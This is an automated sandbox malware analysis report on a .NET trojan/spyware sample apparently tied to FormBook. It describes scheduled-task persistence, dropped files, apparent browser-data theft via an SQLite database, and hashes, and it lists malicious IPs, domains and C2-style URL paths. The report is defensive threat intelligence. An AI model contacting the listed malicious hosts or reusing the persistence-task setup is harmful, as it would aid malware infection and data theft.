Start date and time:	2024-11-11 06:49:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	fHkdf4WB7zhMcqP.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/16@16/13
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 97% Number of executed functions: 191 Number of non-executed functions: 297
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target qLmzoTzSrlQuBN.exe, PID 5548 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:49:55	API Interceptor	2x Sleep call for process: fHkdf4WB7zhMcqP.exe modified
00:50:03	API Interceptor	42x Sleep call for process: powershell.exe modified
00:50:08	API Interceptor	2x Sleep call for process: vssfbkdOErXuYi.exe modified
00:50:54	API Interceptor	11882718x Sleep call for process: icacls.exe modified
05:50:03	Task Scheduler	Run new task: vssfbkdOErXuYi path: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
206.119.82.172	wODub61gZe.exe	Get hash	malicious	FormBook	Browse	www.d97fw.top/ep96/
	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	www.wddb97.top/a3g3/
	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	www.wddb97.top/a3g3/
	Arrival Notice_pdf.exe	Get hash	malicious	FormBook	Browse	www.d97fw.top/07qt/
	RECIEPT.PDF.exe	Get hash	malicious	FormBook	Browse	www.d97fw.top/j0mp/
13.248.169.48	New PO [FK4-7173].pdf.exe	Get hash	malicious	FormBook	Browse	www.sonoscan.org/xlhb/
	AWB_NO_907853880911.exe	Get hash	malicious	FormBook	Browse	www.xphone.net/i7vz/
	s7wZiIHFbt.exe	Get hash	malicious	Unknown	Browse	shopistar.com/clip.exe
	Z4KBs1USsJ.exe	Get hash	malicious	Unknown	Browse	difficultpeople.net/index.php
	YiqjcLlhew.exe	Get hash	malicious	Unknown	Browse	difficultpeople.net/index.php
	Z4KBs1USsJ.exe	Get hash	malicious	Unknown	Browse	difficultpeople.net/index.php
	Y7isAhMKal.exe	Get hash	malicious	FormBook	Browse	www.how2.guru/20wk/
	SDBARVe3d3.exe	Get hash	malicious	FormBook	Browse	www.sonoscan.org/ew98/
	3NvALxFlHV.exe	Get hash	malicious	FormBook	Browse	www.solidarity.rocks/hezo/
	FzmC0FwV6y.exe	Get hash	malicious	FormBook	Browse	www.virtu.industries/uln2/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.havan-oficial.online	icRicpJWczmiOf8.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
www.ulula.org	icRicpJWczmiOf8.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
www.qadlo.life	icRicpJWczmiOf8.exe	Get hash	malicious	FormBook	Browse	162.0.211.143

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VIMRO-AS15189US	New PO [FK4-7173].pdf.exe	Get hash	malicious	FormBook	Browse	67.223.117.142
	SHIPPING DOC_20241107.exe	Get hash	malicious	FormBook	Browse	67.223.117.142
	proforma Invoice.exe	Get hash	malicious	FormBook	Browse	67.223.117.142
	DHL_doc.exe	Get hash	malicious	FormBook	Browse	67.223.117.142
	icRicpJWczmiOf8.exe	Get hash	malicious	FormBook	Browse	67.223.118.17
	SecuriteInfo.com.FileRepMalware.20173.21714.exe	Get hash	malicious	FormBook	Browse	67.223.117.142
	INVOICES.exe	Get hash	malicious	FormBook	Browse	67.223.117.142
	QUOTE2342534.exe	Get hash	malicious	FormBook	Browse	67.223.117.169
	foljNJ4bug.exe	Get hash	malicious	FormBook	Browse	67.223.117.189
	PO#001498.exe	Get hash	malicious	FormBook	Browse	67.223.117.169
AMAZON-02US	https://parkonking.us15.list-manage.com/track/click?u=ad047aa5468a45d38c75e108c&id=88101fd354&e=1659a0a55d	Get hash	malicious	Unknown	Browse	54.246.144.89
	https://anzsupportus.web.app/#	Get hash	malicious	Unknown	Browse	3.161.82.69
	https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t	Get hash	malicious	HTMLPhisher	Browse	18.244.18.5
	https://hobitronik.com/	Get hash	malicious	Unknown	Browse	13.32.99.71
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	52.222.169.76
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.244.18.122
	sora.mips.elf	Get hash	malicious	Mirai	Browse	44.235.168.154
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	34.220.228.138
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	18.183.83.96
	shellv.m68k.elf	Get hash	malicious	Gafgyt, Mirai	Browse	34.249.145.219
COGENT-174US	sora.ppc.elf	Get hash	malicious	Mirai	Browse	39.0.189.25
	sora.arm.elf	Get hash	malicious	Mirai	Browse	206.119.119.205
	yakuza.mips.elf	Get hash	malicious	Unknown	Browse	149.16.115.193
	yakuza.arm4.elf	Get hash	malicious	Unknown	Browse	38.176.131.48
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	38.3.100.64
	shindeVarm7.elf	Get hash	malicious	Mirai	Browse	38.54.248.202
	5r3fqt67ew531has4231.sh4.elf	Get hash	malicious	Mirai, Okiru	Browse	149.51.254.20
	yakuza.x86.elf	Get hash	malicious	Unknown	Browse	149.115.174.218
	5r3fqt67ew531has4231.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	149.6.31.194
	linux_386.elf	Get hash	malicious	Kaiji	Browse	38.55.251.57
ACPCA	sora.m68k.elf	Get hash	malicious	Mirai	Browse	162.22.50.159
	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	7rxE4s9EEG.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	fS5TEjVseD.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	SDBARVe3d3.exe	Get hash	malicious	FormBook	Browse	162.0.211.143
	Nvojocm.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Documentos_xlsm.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	pSU7fuySjo.elf	Get hash	malicious	Mirai, Moobot	Browse	162.37.65.173
	Hesap.exe	Get hash	malicious	FormBook	Browse	162.0.209.213
	SecuriteInfo.com.Win32.DropperX-gen.6684.1882.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2

Process:	C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vssfbkdOErXuYi.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCsIfA2KRHmOugw1s
MD5:	2841736A1E367C6D039C41512DA2893E
SHA1:	8AE1356D954F14390DD115EB92E2B01F86E98141
SHA-256:	70D4743FAB5C407020B872595615D3B018AC17A6F504084BF1E95B061C97047E
SHA-512:	E11A1F186A9B75658F905B7128526E054CEE572A4F55BBB864B5E8B5DC3D8B62D1E160F31472213DB0CEB8A612D71B23DAE03EBC6AB5BC0D8933732F2007EF6C
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\6-G0991eL2

Download File

Process:	C:\Windows\SysWOW64\icacls.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4j21uuzc.fih.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jtlxl2b.jpv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akhtnhgc.noa.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzc3xk0y.5d2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_movg52gm.l0n.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oyetvcq4.tty.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r10l5ini.33y.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zn1zrun4.dw3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp6426.tmp

Download File

Process:	C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.1147815725828965
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaE5axvn:cge1wYrFdOFzOzN33ODOiDdKrsuT9uv
MD5:	96B8B237FB3F8DB2F5F85017B619217B
SHA1:	07D439310D839A92AFD590B4BECE4D66BB9BF14D
SHA-256:	B6E9BCDAB01C873844C63A086AC19E067A0A381FE32C899DD08AB478AAD959CA
SHA-512:	31BBA2494CE77C2CEAF1F2376696591268BBB2F22532353E4BD7E7B9FBF3B307F719057513B4BC696C196AA05FA7E2D7F279A9BDA1F2C0477A139DDB36489EC8
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp91BE.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.1147815725828965
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaE5axvn:cge1wYrFdOFzOzN33ODOiDdKrsuT9uv
MD5:	96B8B237FB3F8DB2F5F85017B619217B
SHA1:	07D439310D839A92AFD590B4BECE4D66BB9BF14D
SHA-256:	B6E9BCDAB01C873844C63A086AC19E067A0A381FE32C899DD08AB478AAD959CA
SHA-512:	31BBA2494CE77C2CEAF1F2376696591268BBB2F22532353E4BD7E7B9FBF3B307F719057513B4BC696C196AA05FA7E2D7F279A9BDA1F2C0477A139DDB36489EC8
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe

Download File

Process:	C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	905736
Entropy (8bit):	7.088526078352763
Encrypted:	false
SSDEEP:	24576:T/MvSg4orqhBvdcmXDiPE0hXydCwybjoFwSi:TCD4oGh5TX+zwCEFpi
MD5:	9C0CF646FC8BC953E11228211A03DEC8
SHA1:	D2645B38EDD984BDCB384B8547E6F6F25EF22D41
SHA-256:	6563B16904DF3E6E15A66292BEE241BEE856AB8668DA10D15217D7E19C612E53
SHA-512:	AE4A4F4F1A14C13A3F17916F32DC0E35DD184916C4ECBFD07C493C7BDA6DD256505EE8802073B64EE2FB831CC6B4962AB4DFE6AC9DE06FAA3C7254A36572ADD3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L1g..............0..x...".......... ........@.. ....................................@....................................O.......T................6..........0y..T............................................ ............... ..H............text...0w... ...x.................. ..`.rsrc...T........ ...z..............@..@.reloc..............................@..B........................H........C..PS..........H...............................................6.(......d......0..O............(....(................o....&.(.........(..........(....(......(............0..D............(....(.............(.............( .......(!....(........o"....0..1..................{+...}6......{,...}7......{-...}8........0..n..................{....}9......{/...}:......{0...};......{1...}<......{2...}=......{3...}>......{4...}?......h}@.......0..1..................{6...}+..

C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.088526078352763
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	fHkdf4WB7zhMcqP.exe
File size:	905'736 bytes
MD5:	9c0cf646fc8bc953e11228211a03dec8
SHA1:	d2645b38edd984bdcb384b8547e6f6f25ef22d41
SHA256:	6563b16904df3e6e15a66292bee241bee856ab8668da10d15217d7e19c612e53
SHA512:	ae4a4f4f1a14c13a3f17916f32dc0e35dd184916c4ecbfd07c493c7bda6dd256505ee8802073b64ee2fb831cc6b4962ab4dfe6ac9de06faa3c7254a36572add3
SSDEEP:	24576:T/MvSg4orqhBvdcmXDiPE0hXydCwybjoFwSi:TCD4oGh5TX+zwCEFpi
TLSH:	B9150251BB56E022CEC533351F70D77E07759C8DA96093135AFABDAB3CBD22BA804294
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L1g..............0..x..."......*.... ........@.. ....................................@................................

File Icon


Icon Hash:	6ccc8cad9fce6c0b

Static PE Info

General

Entrypoint:	0x4d972a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67314CED [Mon Nov 11 00:16:45 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
